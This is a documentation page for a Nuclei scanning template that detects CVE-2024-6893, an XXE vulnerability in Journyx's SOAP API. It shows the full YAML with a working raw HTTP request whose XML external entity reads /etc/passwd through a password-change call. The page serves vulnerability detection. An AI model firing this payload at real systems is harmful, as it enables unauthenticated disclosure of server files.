Skip to content
Nuclei Templates

Journyx - XML External Entities Injection (XXE)

ID: CVE-2024-6893

Severity: high

Author: s4e-io

Tags: cve,cve2024,journyx,xxe

Description

Section titled “Description”

The “soap_cgi.pyc” API handler allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources.

YAML Source

Section titled “YAML Source”
id: CVE-2024-6893


info:
  name: Journyx - XML External Entities Injection (XXE)
  author: s4e-io
  severity: high
  description: |
    The "soap_cgi.pyc" API handler allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources.
  reference:
    - https://securityforeveryone.com/tools/journyx-xxe-cve-2024-6893
    - https://korelogic.com/Resources/Advisories/KL-001-2024-010.txt
    - https://packetstormsecurity.com/files/180005/Journyx-11.5.4-XML-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6893
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-6893
    cwe-id: CWE-611
  metadata:
    max-request: 1
    vendor: journyx
    product: journyx-jtime
    fofa-query: icon_hash="-109972155"
  tags: cve,cve2024,journyx,xxe


variables:
  pass: "{{rand_text_alpha(5)}}"


http:
  - raw:
      - |
        POST /jtcgi/soap_cgi.pyc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        <?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>{{pass}}</curpwd><newpwd>{{pass}}</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "invalid password for user"
        condition: and


      - type: word
        part: header
        words:
          - "text/xml"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b15bb9d9a8ce1411368b9ae2388394f0e6843389f915f7322851051fe4f88cb6022064729990a01eab232a3a2c99463c57b1cca6d43eddcdb4ec9807e05ceb4a67d9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6893.yaml"

View on Github